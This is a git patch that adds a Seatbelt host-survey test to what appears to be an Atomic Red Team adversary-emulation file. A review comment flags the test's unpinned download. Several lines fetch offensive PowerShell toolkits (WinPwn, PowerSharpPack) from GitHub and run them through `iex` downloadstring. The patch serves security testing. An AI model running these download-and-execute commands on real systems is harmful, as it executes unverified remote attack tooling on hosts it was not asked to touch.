From 7f14e048e0efc698df7db6870d46f7ee458007df Mon Sep 17 00:00:00 2001
From: tlor89 <60741301+tlor89@users.noreply.github.com>
Date: Thu, 12 May 2022 18:53:54 -0500
Subject: [PATCH] Update T1082.yaml (#1951)
* Update T1082.yaml PowerSharpPack - Seatbelt technique via function of WinPwn performing Local Privileges escalation
* Update T1082.yaml
* Update T1082.yaml
Co-authored-by: Carrie Roberts
---
 atomics/T1082/T1082.yaml | 14 ++++++++++++++
 1 file changed, 14 insertions(+)
diff --git a/atomics/T1082/T1082.yaml b/atomics/T1082/T1082.yaml
index 089c1893..5b120108 100644
--- a/atomics/T1082/T1082.yaml
+++ b/atomics/T1082/T1082.yaml
@@ -239,6 +239,7 @@ atomic_tests:
 iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
 RBCD-Check -consoleoutput -noninteractive
 name: powershell
+
 - name: WinPwn - PowerSharpPack - Watson searching for missing windows patches
 auto_generated_guid: 07b18a66-6304-47d2-bad0-ef421eb2e107
 description: PowerSharpPack - Watson searching for missing windows patches technique via function of WinPwn
@@ -259,3 +260,16 @@ atomic_tests:
 iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1')
 Invoke-SharpUp -command "audit"
 name: powershell
+
+- name: WinPwn - PowerSharpPack - Seatbelt
+ description: |-
+ PowerSharpPack - Seatbelt technique via function of WinPwn.
+
+ [Seatbelt](https://github.com/GhostPack/Seatbelt) is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.
+ supported_platforms:
+ - windows
+ executor:
+ command: |-
+ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')
+ Invoke-Seatbelt -Command "-group=all"; pause
+ name: powershell
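Review bot: In the second hunk, the new Seatbelt test's `command` fetches `Invoke-Seatbelt.ps1` from the `master` branch and passes it straight to `iex`, so whatever is on that branch at run time executes on the test host with no integrity check. The RBCD-Check test shown as context in the first hunk pins its WinPwn download to a commit hash; the same should be done here, e.g. `.../PowerSharpPack/<reviewed-commit-sha>/PowerSharpBinaries/Invoke-Seatbelt.ps1`, so the test stays reproducible and an upstream change cannot silently alter what runs. The trailing `; pause` probably stalls unattended runs while it waits for input and could be dropped. The `description` would also benefit from one sentence stating that the test needs outbound access to raw.githubusercontent.com and that `-group=all` runs every Seatbelt check group.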